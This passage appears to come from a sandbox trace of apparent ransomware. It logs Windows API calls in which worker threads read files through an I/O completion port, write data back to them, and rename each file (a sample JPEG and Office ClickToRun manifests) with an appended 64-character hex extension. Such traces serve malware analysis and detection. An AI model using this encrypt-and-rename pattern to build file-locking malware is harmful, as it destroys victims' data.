lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050) returned 1 [0169.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, 
lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.014] ReadFile (in: hFile=0x5d4, lpBuffer=0x77292e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8) returned 1 [0169.015] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.015] ReadFile (in: hFile=0x5ac, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0169.016] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.016] ReadFile (in: hFile=0x4a8, lpBuffer=0x76292e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76091a8 | out: lpBuffer=0x76292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76091a8) returned 1 [0169.017] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.017] ReadFile (in: hFile=0x5e4, lpBuffer=0x7651438, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7631300 | out: lpBuffer=0x7651438*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7631300) returned 1 [0169.018] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.018] ReadFile (in: hFile=0x5dc, lpBuffer=0x7679590, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7659458 | out: lpBuffer=0x7679590*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7659458) returned 1 [0169.019] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.019] ReadFile (in: hFile=0x5e0, lpBuffer=0x77a1298, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7781160 | out: lpBuffer=0x77a1298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7781160) returned 1 [0169.019] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.020] ReadFile (in: hFile=0x304, lpBuffer=0x77c93f0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x77a92b8 | out: lpBuffer=0x77c93f0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77a92b8) returned 1 [0169.020] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.020] ReadFile (in: hFile=0x5c0, lpBuffer=0x77f1548, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77d1410 | out: lpBuffer=0x77f1548*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77d1410) returned 1 [0169.021] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, 
lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.021] ReadFile (in: hFile=0x5bc, lpBuffer=0x78196a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77f9568 | out: lpBuffer=0x78196a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77f9568) returned 1 [0169.022] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.022] ReadFile (in: hFile=0x5e8, lpBuffer=0x78417f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78216c0 | out: lpBuffer=0x78417f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78216c0) returned 1 [0169.023] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.023] ReadFile (in: hFile=0x5ec, lpBuffer=0x7869950, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7849818 | out: lpBuffer=0x7869950*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7849818) returned 1 [0169.024] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.024] ReadFile (in: hFile=0x5f0, lpBuffer=0x7891aa8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7871970 | out: lpBuffer=0x7891aa8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7871970) returned 1 [0169.025] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.025] ReadFile (in: hFile=0x5f4, lpBuffer=0x78b9c00, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7899ac8 | out: lpBuffer=0x78b9c00*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7899ac8) returned 1 [0169.026] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.026] ReadFile (in: hFile=0x5b4, lpBuffer=0x78e1d58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1c20 | out: lpBuffer=0x78e1d58*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1c20) returned 1 [0169.027] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.027] ReadFile (in: hFile=0x5d8, lpBuffer=0x7909eb0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9d78 | out: lpBuffer=0x7909eb0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9d78) returned 1 [0169.028] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.028] WriteFile (in: hFile=0x594, lpBuffer=0x752a588*, nNumberOfBytesToWrite=0x3400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450) returned 1 [0169.280] 
RtlInterlockedCompareExchange64 () returned 0x1 [0169.280] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0170.956] ReadFile (in: hFile=0x58c, lpBuffer=0x752a588, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450) returned 1 [0170.968] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0171.605] ReadFile (in: hFile=0x600, lpBuffer=0x7779140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008) returned 1 [0171.605] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0171.646] WriteFile (in: hFile=0x5fc, lpBuffer=0x75ca140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008) returned 1 [0171.826] RtlInterlockedCompareExchange64 () returned 0x1 [0171.826] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0171.826] WriteFile (in: hFile=0x5d8, lpBuffer=0x752a588*, 
nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450) returned 1 [0171.836] RtlInterlockedCompareExchange64 () returned 0x7 [0171.836] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0172.026] NtQueryObject (in: Handle=0x604, ObjectInformationClass=0x1, ObjectInformation=0x76e1100, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x76e1100, ReturnLength=0x422f7cc) returned 0x0 [0172.027] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg", lpString2=".DA51F0354964DED83AAE4ED254C9C2DEAD4C82A048146D0B0EC7456C9A872070" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.DA51F0354964DED83AAE4ED254C9C2DEAD4C82A048146D0B0EC7456C9A872070") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.DA51F0354964DED83AAE4ED254C9C2DEAD4C82A048146D0B0EC7456C9A872070" [0172.028] GetProcessHeap () returned 0x270000 [0172.028] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x4333550 [0172.028] NtSetInformationFile (FileHandle=0x604, IoStatusBlock=0x422f7bc, FileInformation=0x4333550, Length=0x122, FileInformationClass=0xa) returned 0x0 [0172.118] CloseHandle (hObject=0x604) returned 1 [0172.120] GetProcessHeap () returned 0x270000 [0172.121] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76e1050 | out: hHeap=0x270000) returned 1 [0172.121] RtlInterlockedCompareExchange64 () returned 0x6 [0172.121] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff) Thread: 
id = 109 os_tid = 0xad8 [0142.354] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.029] ReadFile (in: hFile=0x590, lpBuffer=0x7492450, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0156.029] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.031] WriteFile (in: hFile=0x590, lpBuffer=0x7492450*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7472318) returned 1 [0156.046] RtlInterlockedCompareExchange64 () returned 0x1 [0156.046] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.059] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74723c8, ReturnLength=0x723f8ec) returned 0x0 [0156.060] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2=".24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B" | out: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.24E7C66C892BEE3B245EAB1343FADE89A7E3F2AE47999FF6A99BE9CAC204897B" [0156.060] GetProcessHeap () returned 0x270000 [0156.060] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b4) returned 0x42fc2d8 [0156.060] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x42fc2d8, Length=0x1b4, FileInformationClass=0xa) returned 0x0 [0156.062] CloseHandle (hObject=0x590) returned 1 [0156.071] GetProcessHeap () returned 0x270000 [0156.072] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0156.079] RtlInterlockedCompareExchange64 () returned 0x1 [0156.079] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.082] ReadFile (in: hFile=0x59c, lpBuffer=0x74e2700, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c25c8 | out: lpBuffer=0x74e2700*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c25c8) returned 1 [0156.083] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.083] WriteFile (in: hFile=0x59c, lpBuffer=0x74e2700*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c25c8 | out: lpBuffer=0x74e2700*, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c25c8) returned 1 [0156.084] RtlInterlockedCompareExchange64 () returned 0x0 [0156.084] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.086] NtQueryObject (in: Handle=0x59c, ObjectInformationClass=0x1, ObjectInformation=0x74c2678, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c2678, ReturnLength=0x723f8ec) returned 0x0 [0156.087] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2=".04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml.04C1C00C6DB496DFDBD407919C1F16683C521639E60E2E93767CB07E6426287C" [0156.087] GetProcessHeap () returned 0x270000 [0156.087] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b8) returned 0x42fc4a0 [0156.087] NtSetInformationFile (FileHandle=0x59c, IoStatusBlock=0x723f8dc, FileInformation=0x42fc4a0, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0156.088] CloseHandle (hObject=0x59c) returned 1 [0156.091] GetProcessHeap () returned 0x270000 [0156.093] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c25c8 | out: hHeap=0x270000) returned 1 [0156.097] RtlInterlockedCompareExchange64 () returned 0x1 [0156.097] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.101] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.101] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.102] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.102] RtlInterlockedCompareExchange64 () returned 0x0 [0156.103] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.103] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0156.104] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml", lpString2=".63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B" | out: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.63EDB90223550D3E17FFCC8D3E38E6D7888D9EB7A5EDA6A20DCF7A1E86A0356B" [0156.104] GetProcessHeap () returned 0x270000 [0156.104] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a0) returned 0x336820 [0156.104] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x336820, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0156.121] CloseHandle (hObject=0x590) returned 1 [0156.125] GetProcessHeap () returned 0x270000 [0156.126] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.126] RtlInterlockedCompareExchange64 () returned 0x1 [0156.126] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.129] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.129] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.130] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, 
lpOverlapped=0x7422068) returned 1 [0156.131] RtlInterlockedCompareExchange64 () returned 0x0 [0156.131] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.132] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7422118, ReturnLength=0x723f8ec) returned 0x0 [0156.133] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml", lpString2=".928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml.928855FAC863A5A274AD5647EACF0DBEA604FA8257C85E77997382FC3561CB7C" [0156.133] GetProcessHeap () returned 0x270000 [0156.134] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1b0) returned 0x4245f00 [0156.134] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x723f8dc, FileInformation=0x4245f00, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0156.136] CloseHandle (hObject=0x590) returned 1 [0156.141] GetProcessHeap () returned 0x270000 [0156.143] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.143] RtlInterlockedCompareExchange64 () returned 0x1 [0156.143] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, 
lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.145] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x5a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.145] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0156.146] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.147] RtlInterlockedCompareExchange64 () returned 